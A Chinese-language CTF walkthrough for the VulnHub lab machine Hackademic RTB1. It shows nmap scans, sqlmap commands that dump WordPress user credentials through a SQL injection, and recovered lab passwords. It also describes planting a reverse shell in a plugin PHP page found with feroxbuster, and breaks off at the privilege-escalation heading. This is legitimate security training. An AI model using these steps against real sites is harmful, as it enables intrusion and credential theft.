介绍
系列:Hackademic(此系列共2台)
发布日期:2011年9月6日
难度:初级
运行环境:VMware Workstation
目标:取得 root 权限 + flag
学习:
- 主机发现
- 端口扫描+漏洞扫描
- Sql注入
- wordpress挂马
- 内核提权
靶机地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/
信息收集
主机发现
netdiscover主机发现
sudo netdiscover -i eth0 -r 192.168.229.0/24
主机信息探测
只是开启了22,80端口,没探测到什么有价值的信息。
nmap -p- 192.168.229.130
nmap -p 22,80 -A 192.168.229.130
nmap -p 22,80 --script=vuln 192.168.229.130
网站探测
打开网站,告诉我们目标地址,点开它
注意到uri地址里面似乎有sql注入,通过插件得知系统是 WordPress 1.5.1.1
测试一下,果然存在报错
Sql注入
sqlmap -u http://192.168.229.130/Hackademic_RTB1/?cat=1 --dbs
sqlmap -u http://192.168.229.130/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables
sqlmap -u http://192.168.229.130/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns
sqlmap -u http://192.168.229.130/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump
然后使用账号密码:NickJames、admin直接登录靶机
挂马
使用普通账户登录貌似有点问题,登录之后没有配置网站的选项,后来使用账号密码:GeorgeMiller、q1w2e3登录了靶场。配置完php选项之后,很尴尬,没有文件上传点。
来到插件处,找个php页面,写入反弹shell,然后kali开启监听
接下来的问题是,怎么找到这个php页面,你如果对wordpress不了解的话,有个狗招,用feroxbuster做目录爆破。选用feroxbuster的原因有二,第一它默认做4层递归爆破,第二它支持提取网页中的链接地址,并进行爆破,得到地址是 http://192.168.229.130/Hackademic_RTB1/wp-content/plugins/hello.php
./feroxbuster -u http://192.168.229.130/Hackademic_RTB1 -w /usr/share/wordlists/SecLists-2022.4/Discovery/Web-Content/common.txt -e
提权
